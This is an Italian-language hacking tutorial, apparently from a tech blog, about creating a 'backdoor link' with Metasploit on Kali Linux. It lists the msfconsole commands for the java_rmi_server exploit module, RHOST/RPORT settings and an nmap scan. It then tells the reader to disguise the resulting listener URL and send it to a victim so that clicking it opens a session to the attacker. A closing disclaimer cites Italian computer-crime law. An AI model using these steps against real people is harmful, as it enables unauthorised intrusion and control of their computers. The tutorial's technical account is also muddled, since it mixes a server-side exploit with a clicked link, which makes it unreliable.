Abbiamo analizzato già alcune volte i modi per creare link backdoor, ovvero dei link che una volta aperti dalla vittima aprono una comunicazione tra il computer attaccante e il computer target. Nel corso del tempo analizzeremo molti metodi simili per creare questo tipo interessante di backdoor, ma entriamo nel dettaglio di quello di cui stiamo parlando oggi; servirsi di un link per creare una backdoor in un PC è un metodo molto funzionante in quanto è abbastanza facile camuffare il codice maligno e spedirlo alla vittima, che inconsapevolmente cliccherà su qualcosa che non farà altro che cagionare danni. E’ sempre bene controllare ciò su cui clicchiamo ogni giorno, in quanto potremo ritrovarci “spie” non gradite sul computer che possono avere, a nostra insaputa, il pieno comando del PC. Vediamo adesso come dar vita al nostro link maligno; per prima cosa dobbiamo servirci di Kali Linux; apriamo un terminale e digitiamo il comando “msfconsole”, che aprirà la console di Metasploit Framework che ci guiderà durante tutto il processo di creazione della nostra backdoor.

Creare link backdoor

 

 

 

 

 

 

Procediamo rispettivamente con i seguenti comandi:

-use exploit/multi/misc/java_rmi_server

Creare link backdoor

 

 

 

 

 

 

-set RHOST “ip remoto”

Creare link backdoor

 

 

 

 

 

 

-set RPORT “porta remota”

N.B Come sempre ricordo che la porta remota possiamo ottenerla con una scansione di nmap; il comando per eseguirla è:

nmap “inserire indirizzo IP remoto”

Creare link backdoor

 

 

 

 

 

 

exploit

Creare link backdoor

 

 

 

 

 

 

A questo punto il terminale si metterà in ascolto e non dovremo fare altro che copiare l’indirizzo “Local IP” comparso sul terminale e inviarlo alla vittima, che aprendolo creerà una sessione tra il suo pc e il nostro. In questo caso, per esempio, il Local IP comparso nel mio terminale è:

https://192.168.43.100:8080/PFu15lKmllfGi06

Ricordo che questo articolo è stato creato solamente a scopo informativo e per lo studio delle vulnerabilità informatiche. Non è da intendersi come un incitazione a compiere azioni di danneggiamento verso sistemi informatici non propri. Tutto lo staff di Tecnogalaxy.it non si assume la responsabilità per eventuali usi scorretti che ne farete. Avvisiamo inoltre che viene sanzionato chi, senza essere autorizzato, intercetta, impedisce, interrompe o rivela comunicazioni informatiche, (art. 617 quater c.p.); installa apparecchiature dirette ad intercettare, interrompere o impedire comunicazioni informatiche (art. 617 quinquies c.p.); falsifica, altera, sopprime o falsifica la comunicazione informatica acquisita mediante l’intercettazione (art. 617 sexies c.p.); distrugge, deteriora, cancella dati, informazioni o programmi informatici (art. 635 bis c.p.).